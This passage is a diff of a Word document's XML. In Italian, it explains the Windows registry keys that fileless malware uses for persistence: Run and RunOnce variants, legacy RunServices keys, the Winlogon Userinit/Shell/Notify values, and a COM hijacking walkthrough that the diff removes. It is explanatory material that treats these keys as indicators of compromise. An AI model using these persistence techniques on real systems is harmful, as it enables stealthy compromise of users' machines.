+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Perché il Fileless la usa:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Non richiede privilegi di amministratore per essere modificata. Se un utente apre un allegato malevolo (macro), il malware può scrivere in questa chiave senza far scattare il prompt UAC (Controllo Account Utente).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="11"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run (</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">secuzione per tutti gli utenti, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>richiede</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> privilegi admin).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Esempio Fileless:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Invece di un file, troverai una riga di comando che richiama </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> per caricare un payload dalla RAM o da un'altra chiave di registro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_MACHINE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\Run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="12"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>- HKLM\ Software\Microsoft\Windows\CurrentVersion\RunOnce (esegue e poi cancella la chiave)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Simile alla precedente, ma i comandi qui presenti vengono eseguiti per </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tutti gli utenti</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> del computer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="12"/>
         </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>COM Hijacking (La tecnica del CLSID)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Perché il Fileless la usa:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Garantisce che il malware resti attivo indipendentemente da chi usa il PC. Tuttavia, richiede privilegi di amministratore per essere scritta. È il "passaggio successivo" dopo che il malware ha ottenuto l'escalation dei privilegi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>HKEY_LOCAL_MACHINE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>RunOnce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="13"/>
         </w:numPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Ogni componente software in Windows ha un identificatore unico chiamato </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>CLSID</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (un codice tipo {12345678-ABCD-...}). Questi codici sono mappati nel Registro.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Il meccanismo di attacco:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Normalmente, Windows cerca i componenti prima in HKEY_LOCAL_MACHINE (HKLM - a livello di sistema). Tuttavia, se un utente definisce lo stesso CLSID in HKEY_CURRENT_USER (HKCU), quest'ultimo ha la precedenza.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Cosa fa il malware:</w:t>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Come suggerisce il nome, Windows esegue il comando contenuto in questa chiave </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>una sola volta</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> e poi cancella automaticamente l'intera voce.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="13"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Identifica un CLSID legittimo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> che viene caricato spesso (es. quello che gestisce le icone della barra delle applicazioni o i menu di Explorer).</w:t>
-      </w:r>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Perché il Fileless la usa:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> È perfetta per i "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dropper</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>" o i "loader" che servono solo a installare una persistenza più profonda o a scaricare il malware principale in memoria. Una volta fatto il lavoro, la traccia scompare da sola, rendendo l'analisi post-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mortem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> più difficile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>4. HKEY_CURRENT_USER</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>...\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>RunOnce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="14"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Crea la chiave in HKCU</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Non serve essere amministratori per scrivere qui!</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="708"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Percorso: HKCU\Software\Classes\CLSID\{GUID_LEGITTIMO}\InprocServer32</w:t>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Versione per singolo utente della chiave sopra descritta.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
+          <w:numId w:val="14"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Sostituisce il valore</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Invece del percorso della DLL originale (es. C:\Windows\System32\shell32.dll), inserisce un comando malevolo o il percorso di una propria DLL posizionata altrove.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Perché il Fileless la usa:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Spesso usata per eseguire script di pulizia o per reinserirsi ricorsivamente. Alcuni malware fileless scrivono nuovamente se stessi in questa chiave ogni volta che vengono eseguiti, in modo che sembri sempre una "prima esecuzione".</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5. HKEY_LOCAL_MACHINE ... \</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>RunServices</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Legacy)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="15"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Storicamente usata nelle versioni Windows 9x/Me per avviare processi in background prima del login dell'utente. Nei sistemi moderni (NT, Windows 10/11) non viene processata normalmente all'avvio del desktop.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Viene monitorata dagli strumenti di sicurezza perché alcuni malware tentano di scriverci per "retro-compatibilità" o per ingannare analisti che usano vecchi strumenti di scansione.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="708"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>6. HKEY_LOCAL_MACHINE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>... \</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>RunServicesOnce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Legacy)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Spiegazione:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> La versione "esegui una volta" della precedente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="clear" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1428"/>
+        </w:tabs>
+        <w:ind w:left="1428"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Contesto Tecnico:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Valgono le stesse considerazioni di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>RunServices</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Sebbene obsoleta, è un indicatore di compromissione (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IoC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) se presente in un sistema moderno, poiché nessun software legittimo la utilizza più.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">2. Inizializzazione di Sistema e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Winlogon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Queste chiavi intervengono molto presto nel processo di boot, spesso prima che l'antivirus utente sia attivo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Userinit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Winlogon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Userinit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Tecnica:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Si appende il comando dopo </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>userinit.exe,.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Shell: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Winlogon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\Shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Tecnica:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Sostituisce o affianca explorer.exe.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Notify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>CurrentVersion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Winlogon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Notify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Tecnica:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Carica DLL malevole in risposta a eventi di logon/logoff.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Hijacking</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Redirection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (Dirottamento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e Reindirizzamento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Queste sono le chiavi più "insidiose" perché non creano un nuovo processo visibile, ma modificano il comportamento di programmi legittimi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
